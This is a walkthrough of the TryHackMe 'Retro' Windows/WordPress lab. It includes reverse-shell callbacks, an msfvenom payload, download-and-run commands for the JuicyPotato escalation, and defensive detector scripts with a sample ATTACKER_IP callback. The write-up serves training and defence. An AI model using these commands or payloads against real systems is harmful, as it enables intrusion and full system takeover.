Tryhackme - Retro

In this walkthrough, we will be going through the Retro room from TryHackMe. This room is rated as Hard on the platform and consists of a Windows box running a WordPress blog. The objective is to enumerate the running CMS, gain initial access and perform privilege escalation to capture the root flag. So, let's get started without any delay.

Retro

Machine Info:

Title: Retro CTF
IP address: 10.10.165.84
Difficulty: Hard
Objective: Can you time travel? If not, you might want to think about the next best thing.

Enumeration:

  • I started with my regular nmap scan with service detection, but this time I also specified the -Pn flag to skip ICMP host discovery, since this is a Windows box and it does not respond to ping.

sudo nmap -Pn -sS -sV 10.10.165.84

nmap scan

  • As per the above scan results, we found two open ports: 80 (HTTP) and 3389 (RDP). The HTTP web server running here is Microsoft IIS.

Windows IIS server

  • Next, I used gobuster to perform some directory brute forcing and found the /retro directory in the results.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.165.84/ -w ~/Desktop/Wordlist/directory-small.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.165.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/directory-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/10/31 09:24:43 Starting gobuster in directory enumeration mode
===============================================================
/retro                (Status: 301) [Size: 149] [--> http://10.10.165.84/retro/

gobuster scan

  • Navigating to the found directory reveals a WordPress blog running on it.

Retro blog

  • As I skimmed through the application, I found a comment from the user Wade which contains a potential password: parzival.

Wade's password

  • I further enumerated the application with wpscan but found nothing useful. Only XML-RPC was enabled, which could be used for brute forcing if we come up with nothing else.

wpscan --url http://10.10.165.84/retro/ -e ap

Wp-scan output

Login page link

Wordpress login

  • I tried the earlier found password with the username wade and voila! It let us in.

wade: parzival

Wordpress Dashboard

Initial Access:

  • Next, I edited the 404 template through the Theme Editor and replaced its contents with our reverse shell, pointing it at our IP address to call back to.

404.php

  • I started my netcat listener and then navigated to a non-existent post so that the edited 404 template would execute. As soon as I hit the link, it gave me a connection back.

netcat listener

  • Once I got initial access, I was unable to read the flags as we were restricted to the web user's privileges. So, we have to perform some privilege escalation in order to become NT Authority\System on the server and access our flag files.
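From a defender's side, the Theme Editor trick above leaves a file-level tell: a 404.php containing socket or process-execution calls that a stock template never makes. The following is an added example, not code from the original walkthrough, that scans theme files for such calls and checks whether wp-config.php disables the editor via DISALLOW_FILE_EDIT; the watch-list of function names and the sample 404.php contents are constructed.

```python
import re
from pathlib import Path

# Calls a stock 404 template has no business making (assumed watch-list; extend as needed).
SUSPICIOUS = {"fsockopen", "pfsockopen", "stream_socket_client", "socket_create",
              "shell_exec", "exec", "system", "passthru", "proc_open", "popen", "eval"}
CALL_RE = re.compile(r"\b(" + "|".join(sorted(SUSPICIOUS)) + r")\s*\(", re.I)
# wp-config.php setting that removes the Theme Editor entirely (the mitigation).
FILE_EDIT_RE = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)

# Constructed samples: a 404.php after an edit like the one described above
# (placeholder address, incomplete on purpose), and a benign stock template.
INJECTED_404 = """<?php
$sock = fsockopen('ATTACKER_IP', 4444, $errno, $errstr, 30);
$proc = proc_open('cmd.exe', $descriptors, $pipes);
"""
BENIGN_404 = """<?php get_header(); ?>
<h1><?php _e('Page not found', 'retro'); ?></h1>
<?php get_footer(); ?>
"""

def scan_php(src: str) -> list[tuple[int, str]]:
    """Return (line_number, function_name) for each suspicious call in src."""
    return [(n, m.group(1).lower())
            for n, line in enumerate(src.splitlines(), start=1)
            for m in CALL_RE.finditer(line)]

def scan_theme_dir(theme_dir: Path) -> dict[str, list[tuple[int, str]]]:
    """Walk a theme directory (e.g. wp-content/themes/<theme>) and report hits per file."""
    report = {}
    for php in theme_dir.rglob("*.php"):
        if hits := scan_php(php.read_text(errors="replace")):
            report[str(php.relative_to(theme_dir))] = hits
    return report

def file_edit_disabled(wp_config_src: str) -> bool:
    """True if wp-config.php defines DISALLOW_FILE_EDIT as true."""
    return FILE_EDIT_RE.search(wp_config_src) is not None

if __name__ == "__main__":
    for name, src in (("injected 404.php", INJECTED_404), ("stock 404.php", BENIGN_404)):
        print(f"{name}: {scan_php(src) or 'clean'}")
    print("Theme Editor disabled:", file_edit_disabled("define('DISALLOW_FILE_EDIT', true);"))
```

Running scan_theme_dir against a real theme directory will also flag legitimate plugins that shell out, so treat hits as review items rather than verdicts.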

Privilege Escalation:

  • Next, I used the Windows Exploit Suggester script to check for known local privilege escalation exploits. For that, I saved the output of systeminfo from the target machine to a file named systeminfo.txt and ran the script against it. As per the results, we have a couple of candidate exploits, but we will go with the first one.

wh1terose@fsociety:~/Tools/Windows-Exploit-Suggester$ python windows-exploit-suggester.py --database 2023-10-31-mssb.xls --systeminfo ~/CTF/TryHackme/retro/systeminfo.txt --ostext 'windows 10 64-bit' -l 

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] getting OS information from command line text
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns
[*] searching for local exploits only
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation

-- snipped --

Windows Exploit Suggester

  • Let's make a temporary directory on the target to download our exploits into.

mkdir temp

  • First, download the JuicyPotato exploit from your local server. I used Python to spawn an HTTP server on my local machine.

Invoke-WebRequest -Uri 'http://10.18.1.78:8000/JuicyPotato.exe' -OutFile jp.exe

Download the exploit

  • Next, I tried a Nishang PowerShell reverse shell invoked from a batch file. JuicyPotato ran successfully, but this did not grant me a reverse shell; it did, however, give me a working CLSID.

.\jp.exe -t * -p revshell.bat -l 4444

C:\temp>.\jp.exe -t * -p revshell.bat -l 4444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Juicy potato exploit

  • So now, I generated another reverse shell payload, this time a Windows executable built with Metasploit's msfvenom.

wh1terose@fsociety:~/CTF/TryHackme/retro$ msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=10.18.1.78 LPORT=4444 -o rev.exe

reverse shell

  • I downloaded the generated payload to the target machine and executed it through the JuicyPotato exploit, this time passing the CLSID found earlier.

Invoke-WebRequest -Uri 'http://10.18.1.78:8000/rev.exe' -OutFile rev.exe

.\jp.exe -l 4444 -p rev.exe -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

C:\temp>.\jp.exe -l 4444 -p rev.exe -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

juicypotato exploit

  • As soon as I executed it, I received a connection back at my netcat listener.

nt authority/system
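On the detection side, both stages of this box have a recognisable shape in process-creation telemetry: the 404.php stage is a web worker (php-cgi.exe or w3wp.exe) spawning an interactive shell, and the JuicyPotato stage is a child running as NT AUTHORITY\SYSTEM whose parent runs as a low-privileged service account. The following is an added example, not from the original walkthrough, that applies both rules to constructed Sysmon records; field names follow Sysmon's ProcessCreate event (User, ParentUser, Image, ParentImage), and every value in the samples is made up.

```python
import json
from pathlib import PureWindowsPath

SYSTEM = "NT AUTHORITY\\SYSTEM"
# Accounts that legitimately create SYSTEM children (assumed allow-list; tune per host).
PRIVILEGED_PARENTS = {SYSTEM, "NT AUTHORITY\\LOCAL SERVICE", "NT AUTHORITY\\NETWORK SERVICE"}
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}          # IIS / PHP worker processes
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed Sysmon records (Event ID 1 = ProcessCreate, 3 = NetworkConnect),
# one JSON object per line; field names follow Sysmon, values are made up.
SAMPLE_EVENTS = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\svchost.exe","User":"NT AUTHORITY\\SYSTEM","ParentImage":"C:\\Windows\\System32\\services.exe","ParentUser":"NT AUTHORITY\\SYSTEM"}
{"EventID":1,"Image":"C:\\Windows\\System32\\cmd.exe","User":"IIS APPPOOL\\DefaultAppPool","ParentImage":"C:\\php\\php-cgi.exe","ParentUser":"IIS APPPOOL\\DefaultAppPool"}
{"EventID":1,"Image":"C:\\temp\\rev.exe","User":"NT AUTHORITY\\SYSTEM","ParentImage":"C:\\temp\\jp.exe","ParentUser":"IIS APPPOOL\\DefaultAppPool"}
{"EventID":3,"Image":"C:\\temp\\rev.exe","User":"NT AUTHORITY\\SYSTEM","DestinationIp":"10.18.1.78","DestinationPort":4444}
"""

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def is_web_shell_spawn(ev: dict) -> bool:
    """A web worker launching an interactive shell: the 404.php stage above."""
    return (basename(ev.get("ParentImage", "")) in WEB_WORKERS
            and basename(ev.get("Image", "")) in SHELLS)

def is_token_escalation(ev: dict) -> bool:
    """Child runs as SYSTEM while its parent did not: the Potato family's signature."""
    return (ev.get("User", "").upper() == SYSTEM
            and ev.get("ParentUser", "").upper() not in PRIVILEGED_PARENTS)

def detect(event_lines: str) -> list[dict]:
    """Run both rules over newline-delimited JSON events; return one alert per hit."""
    alerts = []
    for raw in event_lines.strip().splitlines():
        ev = json.loads(raw)
        if ev.get("EventID") != 1:          # only process-creation events matter here
            continue
        for rule, check in (("web-worker-spawned-shell", is_web_shell_spawn),
                            ("potato-like-token-escalation", is_token_escalation)):
            if check(ev):
                alerts.append({"rule": rule, "image": ev["Image"],
                               "parent": ev["ParentImage"], "parent_user": ev["ParentUser"]})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The ParentUser field is only populated by recent Sysmon releases, so on older sensors the second rule needs the parent's user resolved from its own ProcessCreate event first.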

  • Got the contents of the user.txt and root.txt files.

user flag

root flag

Task 1 – Pwn

Question 1 – A web server is running on the target. What is the hidden directory which the website lives on?

Question 2 – user.txt

Question 3 – root.txt

Conclusion:

So that was "Retro" for you. We started with our regular nmap scan and found two open ports: 80 (HTTP) and 3389 (RDP). Next, we ran gobuster against the web server and found a directory named /retro hosting a WordPress blog. In one of the comments we found the password for the user wade and used it to get into the WordPress dashboard. We then edited the 404.php template with our reverse shell and got initial access. Moving on, we enumerated with Windows Exploit Suggester and found that the Windows version is vulnerable to the Potato family of exploits. We downloaded the exploit to the system, generated a reverse shell with msfvenom, and used the exploit to get a reverse shell as NT Authority\System, capturing the root flag and photos of your mom's 5th boyfriend. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".
